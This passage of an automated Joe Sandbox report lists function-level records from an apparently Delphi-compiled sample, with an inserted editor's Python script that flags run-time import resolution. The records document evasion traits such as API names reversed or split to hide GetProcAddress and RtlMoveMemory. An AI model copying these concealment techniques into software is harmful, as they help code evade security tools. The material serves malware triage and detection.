                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: Message
                                                                        • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                        • API String ID: 2030045667-32948583
                                                                        • Opcode ID: c3a191fc67c52b72492aa17d1bdb118a70ba76b620af1124a7f4c5e37b23ab6c
                                                                        • Instruction ID: c77f7d508f3d3d4ae2a18e05559799ef109aab43e27fc139491982ed028eae63
                                                                        • Opcode Fuzzy Hash: c3a191fc67c52b72492aa17d1bdb118a70ba76b620af1124a7f4c5e37b23ab6c
                                                                        • Instruction Fuzzy Hash: 39A1E671A042748BDB219A2CCC80B99BBE5EF49350F1440E5ED49AB385CF75CAC5CF9A
                                                                        Strings
                                                                        • Unexpected Memory Leak, xrefs: 02C528C0
                                                                        • , xrefs: 02C52814
                                                                        • An unexpected memory leak has occurred. , xrefs: 02C52690
                                                                        • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02C52849
                                                                        • 7, xrefs: 02C526A1
                                                                        • The unexpected small block leaks are:, xrefs: 02C52707
                                                                        • bytes: , xrefs: 02C5275D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                        • API String ID: 0-2723507874
                                                                        • Opcode ID: b1af171c0d0f6138b23f59a44b6e56e0648df4b6adeb92e4995590907e8117c4
                                                                        • Instruction ID: 10ff52a115c93d03320a73c1fce5e9fa60d2219f62459f8b856f2c5c2f62dd9c
                                                                        • Opcode Fuzzy Hash: b1af171c0d0f6138b23f59a44b6e56e0648df4b6adeb92e4995590907e8117c4
                                                                        • Instruction Fuzzy Hash: 8871C070A042B88FDB219A2CCC84BD9BAE5EF49350F1400E5DD49EB281DB75CAC5CF5A
                                                                        APIs
                                                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 02C6B000
                                                                        • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02C6B017
                                                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 02C6B02F
                                                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 02C6B0AB
                                                                        • IsBadReadPtr.KERNEL32(?,00000002), ref: 02C6B0B7
                                                                        • IsBadReadPtr.KERNEL32(?,00000014), ref: 02C6B0CB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: Read$HandleLibraryLoadModule
                                                                        • String ID: KernelBase$LoadLibraryExA
                                                                        • API String ID: 2872661360-113032527
                                                                        • Opcode ID: b0f44c30a2d11a7281cfc9c1cc310af526b5d7a50f7973fff0692b534b9cb8d3
                                                                        • Instruction ID: 9944e6dbac7c55c9a5837b9626bcb4dc151057dac0bb5994417f01a66a69cb17
                                                                        • Opcode Fuzzy Hash: b0f44c30a2d11a7281cfc9c1cc310af526b5d7a50f7973fff0692b534b9cb8d3
                                                                        • Instruction Fuzzy Hash: A83162B1640305BBEB20DB69CCC9F797BA8AF45358F004611FA24EB281D730EE44DBA4
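Three of the records above show the sample locating APIs by name at run time instead of through its import table: GetModuleHandleA(oleaut32.dll) followed by a GetProcAddress subcall with the Var* name list (consistent with a Delphi runtime's Variants support, so not suspicious on its own), GetModuleHandleA(ole32.dll) followed by six named GetProcAddress calls, and GetModuleHandleW against KernelBase followed by LoadLibraryExA on a name the sandbox could not recover. Pulling exactly those functions out of a report with hundreds of such records is a routine triage step, and the script below is an added example by the editor for that step; it is not part of the Joe Sandbox report or of the sample's code. It parses the per-function record layout used on this page (APIs lines, Similarity fields, records terminated by the Instruction Fuzzy Hash line) and flags functions that combine a module handle with GetProcAddress or load a library by an unrecovered name. The embedded records are excerpted from this report, keeping only the lines the parser reads; the layout rules, field names and flagging heuristic are the script's own assumptions.

```python
"""Triage Joe Sandbox per-function records for run-time import resolution.

Added example by the editor, not part of the Joe Sandbox report or of the
analysed sample. The record-layout rules and the flagging heuristic are this
script's own assumptions, made from the report text on this page.
"""
import re
from dataclasses import dataclass, field

# Excerpted from this report (only the lines the parser reads): the ole32 and
# oleaut32 resolvers, the KernelBase/LoadLibraryExA function, and one plain
# GetLocaleInfoA caller that must not be flagged.
SAMPLE_RECORDS = """\
APIs
• GetModuleHandleA.KERNEL32(ole32.dll), ref: 02C66EDE
• GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02C66EEF
• GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02C66EFF
Similarity
• String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
• Instruction Fuzzy Hash: 7CF04CE1AC83607DBB00BB745CC9A362F9DB9206143701E75ED0359542EE7AD4589F1A
APIs
• GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02C5D29D
  • Part of subcall function 02C5D268: GetProcAddress.KERNEL32(00000000), ref: 02C5D281
Similarity
• String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
• Instruction Fuzzy Hash: 4541A9E1A893B89A52046B6D7800627B7DED644B143E0461BFC06CBB85DE30FDD5DA2E
APIs
• IsBadReadPtr.KERNEL32(?,00000004), ref: 02C6B000
• GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02C6B017
• LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 02C6B02F
Similarity
• String ID: KernelBase$LoadLibraryExA
• Instruction Fuzzy Hash: A83162B1640305BBEB20DB69CCC9F797BA8AF45358F004611FA24EB281D730EE44DBA4
APIs
• GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02C5A7E2
Similarity
• String ID:
• Instruction Fuzzy Hash: 90E0927170022817D715A95A9C80EE6725D9B58310F40426AAD05C7385EDA0DEC04AEC
"""

# '• Name.MODULE(args), ref: ADDR', optionally prefixed 'Part of subcall function ADDR:'
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-F]+)$")
# '• Key: value' lines of the Similarity section
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")
RESOLVERS = {"GetProcAddress"}
LOADERS = {"GetModuleHandleA", "GetModuleHandleW", "LoadLibraryA", "LoadLibraryW",
           "LoadLibraryExA", "LoadLibraryExW"}


@dataclass
class FuncRecord:
    calls: list = field(default_factory=list)   # (name, module, [args], ref)
    fields: dict = field(default_factory=dict)  # Similarity key -> value


def parse_records(text):
    """Split report text into per-function records; a record ends at its
    'Instruction Fuzzy Hash' line. Memory Dump Source / IDA Plugin lines
    match neither pattern and are skipped."""
    records, cur = [], FuncRecord()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            args = [a for a in m["args"].split(",") if a]
            cur.calls.append((m["name"], m["module"], args, m["ref"]))
            continue
        f = FIELD_RE.match(line)
        if f:
            cur.fields[f["key"]] = f["val"]
            if f["key"] == "Instruction Fuzzy Hash":
                records.append(cur)
                cur = FuncRecord()
    return records


def flag_dynamic_imports(records):
    """One finding per function that pairs a module handle/load with
    GetProcAddress, or calls LoadLibrary* on a name the sandbox could not
    recover ('?'). Callers of statically imported APIs yield nothing."""
    findings = []
    for r in records:
        names = {c[0] for c in r.calls}
        unknown_loads = [c[0] for c in r.calls
                         if c[0].startswith("LoadLibrary") and (not c[2] or c[2][0] == "?")]
        if not (names & RESOLVERS or unknown_loads):
            continue
        modules = [c[2][0] for c in r.calls
                   if c[0] in LOADERS and c[2] and c[2][0] not in ("?", "00000000")]
        # Prefer the name argument logged for GetProcAddress; when only the handle
        # was logged (the oleaut32 subcall), fall back to the function's String ID
        # list minus the DLL names.
        api_names = [c[2][1] for c in r.calls
                     if c[0] in RESOLVERS and len(c[2]) > 1 and c[2][1] != "?"]
        if not api_names:
            strings = [s for s in r.fields.get("String ID", "").split("$") if s]
            api_names = [s for s in strings
                         if s not in modules and not s.lower().endswith(".dll")]
        findings.append({"first_ref": r.calls[0][3], "modules": modules,
                         "api_names": api_names, "unknown_loads": unknown_loads,
                         "fuzzy_hash": r.fields.get("Instruction Fuzzy Hash", "")})
    return findings
```

`flag_dynamic_imports(parse_records(SAMPLE_RECORDS))` returns three findings, in record order: ole32.dll with the two named Co* exports, oleaut32.dll with the 22 Var* names recovered from the String ID list, and KernelBase with LoadLibraryExA marked as an unrecovered load; the GetLocaleInfoA record produces nothing. On a full report the whole text can be fed in unchanged, and the Instruction Fuzzy Hash kept in each finding is the field to compare when looking for the same resolver stub in other reports.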
                                                                        APIs
                                                                        • GetThreadLocale.KERNEL32(00000000,02C5C08B,?,?,00000000,00000000), ref: 02C5BDF6
                                                                          • Part of subcall function 02C5A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02C5A7E2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: Locale$InfoThread
                                                                        • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                        • API String ID: 4232894706-2493093252
                                                                        • Opcode ID: e206e0464e130c82baceb652173ce3303461065fbd87d7edfa336a852b973ad6
                                                                        • Instruction ID: d4a61fe2935ac165859df39723c318119b488e9f272147f54bd8ac632a50f3d1
                                                                        • Opcode Fuzzy Hash: e206e0464e130c82baceb652173ce3303461065fbd87d7edfa336a852b973ad6
                                                                        • Instruction Fuzzy Hash: E1618074B002689BDB04EBA5DC5079F77BBDF88300F608536E9019B245CA39DAC5EF98
                                                                        APIs
                                                                        • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02C54423,?,?,02CD67C8,?,?,02C7E7A8,02C565B1,02C7D30D), ref: 02C54395
                                                                        • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02C54423,?,?,02CD67C8,?,?,02C7E7A8,02C565B1,02C7D30D), ref: 02C5439B
                                                                        • GetStdHandle.KERNEL32(000000F5,02C543E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02C54423,?,?,02CD67C8), ref: 02C543B0
                                                                        • WriteFile.KERNEL32(00000000,000000F5,02C543E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02C54423,?,?), ref: 02C543B6
                                                                        • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02C543D4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: FileHandleWrite$Message
                                                                        • String ID: Error$Runtime error at 00000000
                                                                        • API String ID: 1570097196-2970929446
                                                                        • Opcode ID: fe534387ff2c445dc99ee431bf0d0be30d8e1ee79fcaf995d2c9062445798bb4
                                                                        • Instruction ID: 1b5de26b4be699cc66f3aebc0275c74cc57647454482d9618f97e74cda42b1f2
                                                                        • Opcode Fuzzy Hash: fe534387ff2c445dc99ee431bf0d0be30d8e1ee79fcaf995d2c9062445798bb4
                                                                        • Instruction Fuzzy Hash: CBF02462AC532074F738A6B06C4AF5B235C4784F21F140B99FB28940D087F4C0C4AB2E
                                                                        APIs
                                                                          • Part of subcall function 02C5AD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02C5AD59
                                                                          • Part of subcall function 02C5AD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02C5AD7D
                                                                          • Part of subcall function 02C5AD3C: GetModuleFileNameA.KERNEL32(02C50000,?,00000105), ref: 02C5AD98
                                                                          • Part of subcall function 02C5AD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02C5AE2E
                                                                        • CharToOemA.USER32(?,?), ref: 02C5AEFB
                                                                        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02C5AF18
                                                                        • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02C5AF1E
                                                                        • GetStdHandle.KERNEL32(000000F4,02C5AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02C5AF33
                                                                        • WriteFile.KERNEL32(00000000,000000F4,02C5AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02C5AF39
                                                                        • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02C5AF5B
                                                                        • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02C5AF71
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                        • String ID:
                                                                        • API String ID: 185507032-0
                                                                        • Opcode ID: 9fc261b614f99c840fc90390796158cedfe9c845ee1ca82c02a8f9a233f23df6
                                                                        • Instruction ID: cf2e54f58f4e7cb22e01afdde01f22d151593c40d75a339539db8bf115a163be
                                                                        • Opcode Fuzzy Hash: 9fc261b614f99c840fc90390796158cedfe9c845ee1ca82c02a8f9a233f23df6
                                                                        • Instruction Fuzzy Hash: 95115AB2548225BED300FBA4CC81F8B77EDAB44740F904B25BB45D70E0DA75E9849F6A
                                                                        APIs
                                                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02C5E625
                                                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02C5E641
                                                                        • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02C5E67A
                                                                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02C5E6F7
                                                                        • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02C5E710
                                                                        • VariantCopy.OLEAUT32(?,00000000), ref: 02C5E745
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                        • String ID:
                                                                        • API String ID: 351091851-0
                                                                        • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                        • Instruction ID: 1fe0c14c8596b52f3e0e6cd2209017a24743efcca0b76fcebbacc949190ad00f
                                                                        • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                        • Instruction Fuzzy Hash: 4051D47590162D9BCB22DF58C880BDAB3BDAF48340F4041D5EA09A7211DA30EFC59FA9
                                                                        APIs
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02C535BA
                                                                        • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02C53609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02C535ED
                                                                        • RegCloseKey.ADVAPI32(?,02C53610,00000000,?,00000004,00000000,02C53609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02C53603
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: CloseOpenQueryValue
                                                                        • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                        • API String ID: 3677997916-4173385793
                                                                        • Opcode ID: bc155ee099528877abadf58ce691348e7ab12f67d584844ce0c5524f109172d8
                                                                        • Instruction ID: 0e01d2909c12cd01785a90b2561628a1e4c6ac3f4b6b0b05ab4a9a621476ce2c
                                                                        • Opcode Fuzzy Hash: bc155ee099528877abadf58ce691348e7ab12f67d584844ce0c5524f109172d8
                                                                        • Instruction Fuzzy Hash: E601B575940368BAEB11DB908D42BB977ECE708B00F1045A5BE04D7680E6B4E650DA5D
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C682FC,?,?,00000000,00000000,?,02C68215,00000000,KernelBASE,00000000,00000000,02C6823C), ref: 02C682C1
                                                                        • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C682C7
                                                                        • GetProcAddress.KERNEL32(?,?), ref: 02C682D9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$HandleModule
                                                                        • String ID: Kernel32$sserddAcorPteG
                                                                        • API String ID: 667068680-1372893251
                                                                        • Opcode ID: 577061d5fb280453b01deaf45149bceac13a9b0379a52f07daa94dc449a032fd
                                                                        • Instruction ID: 58f868e94b92be5028de16dde345f2964c296c0a428f2fb071f2b0a6b905169e
                                                                        • Opcode Fuzzy Hash: 577061d5fb280453b01deaf45149bceac13a9b0379a52f07daa94dc449a032fd
                                                                        • Instruction Fuzzy Hash: F0016274640314AFEB14EFA4DC95F6EB7EEEB48B10F914970BC04D7600DA70E994DA28
                                                                        APIs
                                                                        • GetThreadLocale.KERNEL32(?,00000000,02C5AAE7,?,?,00000000), ref: 02C5AA68
                                                                          • Part of subcall function 02C5A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02C5A7E2
                                                                        • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02C5AAE7,?,?,00000000), ref: 02C5AA98
                                                                        • EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 02C5AAA3
                                                                        • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02C5AAE7,?,?,00000000), ref: 02C5AAC1
                                                                        • EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 02C5AACC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: Locale$InfoThread$CalendarEnum
                                                                        • String ID:
                                                                        • API String ID: 4102113445-0
                                                                        • Opcode ID: 5f3180ea9252f84f48b58a15795cc6cf7bdf90266b8361a65552ed79675a7a45
                                                                        • Instruction ID: d5b7ec571cd73aa18d91fdb183f6c41bbda49c14fdeceedfc2e115a333652c77
                                                                        • Opcode Fuzzy Hash: 5f3180ea9252f84f48b58a15795cc6cf7bdf90266b8361a65552ed79675a7a45
                                                                        • Instruction Fuzzy Hash: BC01F7B42802747FF611AA65CD21B5A77DDDB85720FA10270FD00A66C0DA75DEC09A6C
                                                                        APIs
                                                                        • GetThreadLocale.KERNEL32(?,00000000,02C5ACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02C5AB2F
                                                                          • Part of subcall function 02C5A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02C5A7E2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: Locale$InfoThread
                                                                        • String ID: eeee$ggg$yyyy
                                                                        • API String ID: 4232894706-1253427255
                                                                        • Opcode ID: 0ed03dbd0742608c8a1ae954f71719c2276753d510452be69c06ebd9a7eecd16
                                                                        • Instruction ID: aa0bf311435c18e85d14802614f8443a43bc9e43a5ea307c61ac2d56e5e39f4b
                                                                        • Opcode Fuzzy Hash: 0ed03dbd0742608c8a1ae954f71719c2276753d510452be69c06ebd9a7eecd16
                                                                        • Instruction Fuzzy Hash: 2141B5707049384BD725EF7B889067EB3E7DF85240B544725DC52C3344EA26EAC1EA6D
                                                                        APIs
                                                                          • Part of subcall function 02C681CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C6823C,?,?,00000000,?,02C67A7E,ntdll,00000000,00000000,02C67AC3,?,?,00000000), ref: 02C6820A
                                                                          • Part of subcall function 02C681CC: GetModuleHandleA.KERNELBASE(?), ref: 02C6821E
                                                                          • Part of subcall function 02C68274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C682FC,?,?,00000000,00000000,?,02C68215,00000000,KernelBASE,00000000,00000000,02C6823C), ref: 02C682C1
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C682C7
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(?,?), ref: 02C682D9
                                                                        • RtlMoveMemory.NTDLL(?,?,?), ref: 02C67ED7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule$AddressProc$MemoryMove
                                                                        • String ID: Ntdll$RtlM$oveM
                                                                        • API String ID: 2705147948-1610840992
